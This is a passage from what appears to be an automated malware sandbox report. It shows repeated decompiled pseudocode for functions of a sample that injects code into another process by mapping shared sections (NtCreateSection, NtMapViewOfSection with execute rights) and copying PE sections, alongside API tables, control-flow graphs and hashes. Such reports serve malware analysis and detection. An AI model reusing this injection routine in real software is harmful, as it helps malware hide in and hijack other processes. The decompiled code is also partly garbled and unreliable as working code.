									_t207 = _t203 + 4;
									_t160 = 0x2260;
									_t161 = _t160 << 5;
									_t162 = _t161 + 0x2260;
									asm("lodsb");
									_t163 = _t162;
									asm("loop 0xffffffc4");
									_t164 = _t163 ^ 0xad610a21;
									_t203 = _t207 - _t164;
									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t138 =  *(_t194 + 6) & 0x0000ffff;
									_push(_t194);
									_t165 = _t194;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t166 = _t165 + 0xf8;
										__eflags = _t166;
									} else {
										_t166 = _t165 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t166 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
										_t203 = _t203 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t187);
									_t226 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t187);
										_t169 = _t187[0xd] -  *(_t201 - 0x40);
										_t197 = _t187[0x28] +  *(_t201 - 0x48);
										__eflags = _t197;
										while(1) {
											__eflags =  *_t197;
											if( *_t197 == 0) {
												break;
											}
											_t179 =  *_t197;
											_t197 = _t197 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t169;
												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t187);
										__eflags = 0;
										_t109 = _t201 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
									} else {
										L52();
										_pop(_t180);
										_t181 = _t180 - 0x1892;
										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
										L004012E3(_t128, _t226);
										0x33(_t181 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t203;
				_push(0x392);
				_t156 = 0xf1;
				return L00401274(_t92, _t156, _t187, _t226);
			}







































                            0x00401605
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                            • Instruction ID: 1fcee3e81df0436361f0f1364465162f3818ae34080ff9e07162e38916551545
                            • Opcode Fuzzy Hash: 415a5842a2c5ec0b738834669aaf024952b371ede68f2027b92f6496f3657053
                            • Instruction Fuzzy Hash: 8451F8B5900249BBEF209F91CC48FEFBFB8EF85B10F140159FA11BA2A5D6749945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 317 401613-40162b call 401274 323 401630-401635 317->323 324 40162d 317->324 326 401956-40195e 323->326 327 40163b-40164c 323->327 324->323 326->323 330 401963-4019b3 call 401274 326->330 331 401652-40167b 327->331 332 401954 327->332 331->332 339 401681-401698 NtDuplicateObject 331->339 332->330 339->332 341 40169e-4016c2 NtCreateSection 339->341 343 4016c4-4016e5 NtMapViewOfSection 341->343 344 40171e-401744 NtCreateSection 341->344 343->344 347 4016e7-401703 NtMapViewOfSection 343->347 344->332 348 40174a-40174e 344->348 347->344 349 401705-40171b 347->349 348->332 350 401754-401775 NtMapViewOfSection 348->350 349->344 350->332 353 40177b-401797 NtMapViewOfSection 350->353 353->332 356 40179d call 4017a2 353->356
                            C-Code - Quality: 59%
                            			E00401613(void* __ebx, void* __esi, void* __eflags) {
				void* _t85;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t129;
				void** _t132;
				signed int _t139;
				int _t140;
				void* _t158;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t167;
				intOrPtr* _t168;
				void* _t171;
				intOrPtr _t181;
				void* _t182;
				void* _t183;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t209;
				long _t224;

				L00401274(_t85, 0xf1, __esi, __eflags);
				_t129 =  *((intOrPtr*)(_t203 + 8));
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
				_t189 = _t203 - 0x60;
				 *_t189 = 0;
				 *((intOrPtr*)(_t129 + 0x4c))(_t88, _t189);
				_t91 =  *_t189;
				if(_t91 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t91;
					_t132[1] = 0;
					_t189 = _t203 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push(_t203 - 0x30);
					_push(_t189);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t203 - 8)) = 0;
						_t99 = _t203 - 0x50;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t191 = _t203 - 0x54;
						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t122 = _t203 - 0x44;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
								_t124 = _t203 - 0x3c;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(0, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
								}
							}
						}
						_t101 = _t203 - 0x50;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t103 = _t203 - 0x48;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
								_t105 = _t203 - 0x40;
								 *_t105 = 0;
								_t224 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
								if(_t224 == 0) {
									L18();
									if(_t224 == 0 && _t224 != 0) {
										asm("hlt");
										_push(_t205);
									}
									_push(0x2ea6);
									_t209 = _t205 + 4;
									_t162 = 0x2260;
									_t163 = _t162 << 5;
									_t164 = _t163 + 0x2260;
									asm("lodsb");
									_t165 = _t164;
									asm("loop 0xffffffc4");
									_t166 = _t165 ^ 0xad610a21;
									_t205 = _t209 - _t166;
									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t139 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t167 = _t196;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t168 = _t167 + 0xf8;
										__eflags = _t168;
									} else {
										_t168 = _t167 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t168 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
										_t205 = _t205 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t228 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t189);
										_t171 = _t189[0xd] -  *(_t203 - 0x40);
										_t199 = _t189[0x28] +  *(_t203 - 0x48);
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t181 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t171;
												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										__eflags = 0;
										_t109 = _t203 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t129 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
									} else {
										L51();
										_pop(_t182);
										_t183 = _t182 - 0x1892;
										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
										L004012E3(_t129, _t228);
										0x33(_t183 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t205;
				_push(0x392);
				_t158 = 0xf1;
				return L00401274(_t92, _t158, _t189, _t228);
			}







































                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                            • Instruction ID: d304ef28c580210a7a0f2ed53d1cda2a55b28a26347542abe822579cf832a140
                            • Opcode Fuzzy Hash: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                            • Instruction Fuzzy Hash: 5E51F6B5900249BBEF209F91CC48FEBBBB8EF85B10F100159FA11BA2A5D6749945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401609 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 358 401609-40162b call 401274 362 401630-401635 358->362 363 40162d 358->363 365 401956-40195e 362->365 366 40163b-40164c 362->366 363->362 365->362 369 401963-4019b3 call 401274 365->369 370 401652-40167b 366->370 371 401954 366->371 370->371 378 401681-401698 NtDuplicateObject 370->378 371->369 378->371 380 40169e-4016c2 NtCreateSection 378->380 382 4016c4-4016e5 NtMapViewOfSection 380->382 383 40171e-401744 NtCreateSection 380->383 382->383 386 4016e7-401703 NtMapViewOfSection 382->386 383->371 387 40174a-40174e 383->387 386->383 388 401705-40171b 386->388 387->371 389 401754-401775 NtMapViewOfSection 387->389 388->383 389->371 392 40177b-401797 NtMapViewOfSection 389->392 392->371 395 40179d call 4017a2 392->395
                            C-Code - Quality: 59%
                            			E00401609(void* __esi) {
				void* _t86;
				intOrPtr _t89;
				void* _t92;
				void* _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				intOrPtr* _t110;
				PVOID* _t123;
				PVOID* _t125;
				intOrPtr _t129;
				void** _t132;
				signed int _t139;
				int _t140;
				void* _t157;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				intOrPtr _t180;
				void* _t181;
				void* _t182;
				HANDLE* _t188;
				HANDLE* _t190;
				void* _t195;
				intOrPtr* _t198;
				void* _t201;
				void* _t202;
				signed int _t204;
				signed int _t205;
				void* _t209;
				signed int _t210;
				long _t224;

				_t205 = _t204 |  *(_t202 + 0xf1baef);
				_t210 = _t205;
				L00401274(_t86, 0xf1, __esi, _t210);
				_t129 =  *((intOrPtr*)(_t202 + 8));
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t89;
				_t188 = _t202 - 0x60;
				 *_t188 = 0;
				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t188);
				_t92 =  *_t188;
				if(_t92 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t92;
					_t132[1] = 0;
					_t188 = _t202 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t188, 0x18);
					 *_t188 = 0x18;
					_push(_t202 - 0x30);
					_push(_t188);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t202 - 8)) = 0;
						_t100 = _t202 - 0x50;
						 *((intOrPtr*)(_t100 + 4)) = 0;
						 *_t100 = 0x5000;
						_t190 = _t202 - 0x54;
						if(NtCreateSection(_t190, 6, 0, _t100, 4, 0x8000000, 0) == 0) {
							 *_t26 =  *(_t202 - 0x50);
							_t123 = _t202 - 0x44;
							 *_t123 = 0;
							if(NtMapViewOfSection( *_t190, 0xffffffff, _t123, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t125 = _t202 - 0x3c;
								 *_t125 = 0;
								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t125, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(0, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
								}
							}
						}
						_t102 = _t202 - 0x50;
						 *((intOrPtr*)(_t102 + 4)) = 0;
						 *_t102 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, 0, _t102, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
							 *_t47 =  *(_t202 - 0x50);
							_t104 = _t202 - 0x48;
							 *_t104 = 0;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t104, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
								_t106 = _t202 - 0x40;
								 *_t106 = 0;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t106, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
								if(_t224 == 0) {
									L17();
									if(_t224 == 0 && _t224 != 0) {
										asm("hlt");
										_push(_t205);
									}
									_push(0x2ea6);
									_t209 = _t205 + 4;
									_t161 = 0x2260;
									_t162 = _t161 << 5;
									_t163 = _t162 + 0x2260;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc4");
									_t165 = _t164 ^ 0xad610a21;
									_t205 = _t209 - _t165;
									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t195 + 6) & 0x0000ffff;
									_push(_t195);
									_t166 = _t195;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t167 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t205 = _t205 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t188);
									_t228 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t188);
										_t170 = _t188[0xd] -  *(_t202 - 0x40);
										_t198 = _t188[0x28] +  *(_t202 - 0x48);
										__eflags = _t198;
										while(1) {
											__eflags =  *_t198;
											if( *_t198 == 0) {
												break;
											}
											_t180 =  *_t198;
											_t198 = _t198 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t170;
												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t188);
										__eflags = 0;
										_t110 = _t202 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t129 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t110, 0);
									} else {
										L50();
										_pop(_t181);
										_t182 = _t181 - 0x1892;
										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
										L004012E3(_t129, _t228);
										0x33(_t182 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t93 =  *_t205;
				_push(0x392);
				_t157 = 0xf1;
				return L00401274(_t93, _t157, _t188, _t228);
			}









































                            0x00401609
                            0x00401609
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 1b824d8c98079b7474f717da7855ee102c1ec14f7644c69b0de31e877fc51f42
                            • Instruction ID: 24bf3b641dcec1e8044d3b4c6b67768af5ca568568a0cd1df2bbcc1fae36a819
                            • Opcode Fuzzy Hash: 1b824d8c98079b7474f717da7855ee102c1ec14f7644c69b0de31e877fc51f42
                            • Instruction Fuzzy Hash: BD51F7B5900249BFEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6749944CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401617 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
